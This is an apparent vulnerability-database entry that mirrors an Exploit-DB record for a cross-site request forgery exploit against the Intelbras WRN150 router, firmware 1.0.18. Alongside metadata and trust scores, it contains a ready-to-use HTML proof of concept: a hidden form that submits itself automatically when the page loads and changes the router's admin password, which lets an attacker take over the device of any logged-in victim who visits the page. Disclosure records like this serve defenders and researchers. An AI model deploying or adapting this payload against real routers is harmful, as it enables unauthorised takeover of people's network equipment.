ID
VAR-E-201910-0138
EDB ID
47545
TITLE
Intelbras Router WRN150 1.0.18 - Cross-Site Request Forgery - Hardware webapps Exploit
Trust: 0.6
DESCRIPTION
Intelbras Router WRN150 1.0.18 - Cross-Site Request Forgery.. webapps exploit for Hardware platform
Trust: 0.6
AFFECTED PRODUCTS
| vendor: | intelbras | model: | router wrn150 | scope: | eq | version: | 1.0.18 | Trust: 1.6 |
EXPLOIT
Exploit Title: Intelbras Router WRN150 1.0.18 - Cross-Site Request Forgery
Date: 2019-10-25
Exploit Author: Prof. Joas Antonio
Vendor Homepage: https://www.intelbras.com/pt-br/
Software Link: http://en.intelbras.com.br/node/25896
Version: 1.0.18
Tested on: Windows
CVE : N/A
####################
# PoC1: https://www.youtube.com/watch?v=V188HHDMbGM&feature=youtu.be
<html>
<body>
<form action="http://10.0.0.1/goform/SysToolChangePwd" method="POST">
<input type="hidden" name="GO" value="system_password.asp">
<input type="hidden" name="SYSPSC" value="0">
<input class="text" type="password" name="SYSOPS" value="hack123"/>
<input class="text" type="password" name="SYSPS" value="mrrobot"/>
<input class="text" type="password" name="SYSPS2" value="mrrobot"/>
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>
Trust: 1.0
EXPLOIT LANGUAGE
txt
Trust: 0.6
PRICE
free
Trust: 0.6
TYPE
Cross-Site Request Forgery
Trust: 1.6
CREDITS
Prof. Joas Antonio
Trust: 0.6
EXTERNAL IDS
| db: | EXPLOIT-DB | id: | 47545 | Trust: 1.6 |
| db: | EDBNET | id: | 102120 | Trust: 0.6 |
REFERENCES
| url: | https://www.exploit-db.com/exploits/47545/ | Trust: 0.6 |
SOURCES
| db: | EXPLOIT-DB | id: | 47545 |
| db: | EDBNET | id: | 102120 |
LAST UPDATE DATE
2022-07-27T09:51:28.684000+00:00
SOURCES RELEASE DATE
| db: | EXPLOIT-DB | id: | 47545 | date: | 2019-10-28T00:00:00 |
| db: | EDBNET | id: | 102120 | date: | 2019-10-28T00:00:00 |